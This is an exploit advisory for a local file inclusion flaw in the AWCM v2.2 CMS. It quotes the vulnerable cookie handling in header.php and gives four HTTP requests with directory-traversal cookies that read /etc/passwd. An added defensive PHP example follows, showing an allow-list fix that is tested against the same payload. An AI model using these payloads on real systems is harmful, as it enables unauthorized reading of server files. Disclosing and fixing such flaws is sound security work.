[+]Exploit Title: [awcm v2.2 final Local File Inclusion]
[+]Date: [26-01-2011]
[+]Author: Cucura , Ste@lth (Bl@ck_Falc0n)
[+]Software Link: [www.awcm-cms.com]
[+]Version: [v2.2]
[+]CVE : -
[+]Contact: Blackcucura[at]Gmail.com

http://sourceforge.net/projects/awcm/files/
-----------------------------------------------------------------
Vuln C0de in header.php

if(isset($_COOKIE['awcm_theme'])) {
    $theme_file = $_COOKIE['awcm_theme'];
} else {
    $theme_file = $mysql_maininfo_row['defult_theme'];
}
if(isset($_COOKIE['awcm_lang'])) {
    $lang_file = $_COOKIE['awcm_lang'];
} else {
    $lang_file = $mysql_maininfo_row['defult_language'];
}
-----------------------------------------------------------------
[+]Exploit: http://target/awcm/index.php
GET http://192.168.43.173/awcm/index.php HTTP/1.0
Cookie: awcm_theme=../../../../etc/passwd%00;

[+]Exploit: http://target/awcm/index.php
GET http://192.168.43.173/awcm/index.php HTTP/1.0
Cookie: awcm_lang=../../../../etc/passwd%00;

[+]Exploit: http://target/awcm/header.php
GET http://192.168.43.173/awcm/header.php HTTP/1.0
Cookie: awcm_lang=../../../../etc/passwd%00;

[+]Exploit: http://target/awcm/header.php
GET http://192.168.43.173/awcm/header.php HTTP/1.0
Cookie: awcm_theme=../../../../etc/passwd%00;
-----------------------------------------------------------------
Greetz : SpeeDr00t, ReDr0se, InsideJ , eidisky
Bl@ck Falc0n Team
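
A hardened form of the cookie handling quoted from header.php, as an added example that is not part of the original advisory and not AWCM's own code: the cookie value is accepted only when it exactly matches a directory that exists under a fixed base path, otherwise the database default is used. The function name, the directory layout and the premise that the selected name is later used to build an include path are assumptions.

```php
<?php
// Added example, not AWCM code. Function name and directory layout are hypothetical.

/**
 * Return $requested only if it is the exact name of a subdirectory of $baseDir;
 * otherwise return $default (the value the application reads from its database).
 */
function pick_allowed_name($requested, string $default, string $baseDir): string
{
    // Build the allow-list from what is actually installed under $baseDir.
    $allowed = [];
    foreach (scandir($baseDir) ?: [] as $entry) {
        if ($entry[0] !== '.' && is_dir($baseDir . '/' . $entry)) {
            $allowed[] = $entry;
        }
    }
    // is_string() rejects array-valued cookies (awcm_theme[]=x); the strict
    // in_array() rejects anything containing "/", ".." or a NUL byte, because
    // no directory entry name can equal such a string.
    if (is_string($requested) && in_array($requested, $allowed, true)) {
        return $requested;
    }
    if ($requested !== null) {
        // Rejected values are worth logging: traversal sequences in these
        // cookies are a clear sign of probing.
        $shown = is_string($requested)
            ? rawurlencode(substr($requested, 0, 64))
            : gettype($requested);
        error_log('rejected theme/lang cookie value: ' . $shown);
    }
    return $default;
}

// Constructed demo tree standing in for the application's theme directory.
$base = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/default', 0700, true);
mkdir($base . '/dark', 0700, true);

// Constructed inputs: a valid name, the advisory's payload after URL decoding,
// a traversal that starts with a valid name, an array cookie, and no cookie.
$cases = ['dark', "../../../../etc/passwd\0", 'dark/../../x', ['x'], null];
foreach ($cases as $cookie) {
    echo json_encode($cookie), ' => ', pick_allowed_name($cookie, 'default', $base), "\n";
}

rmdir($base . '/default');
rmdir($base . '/dark');
rmdir($base);
```

Only the first constructed input selects `dark`; every other input falls back to `default`.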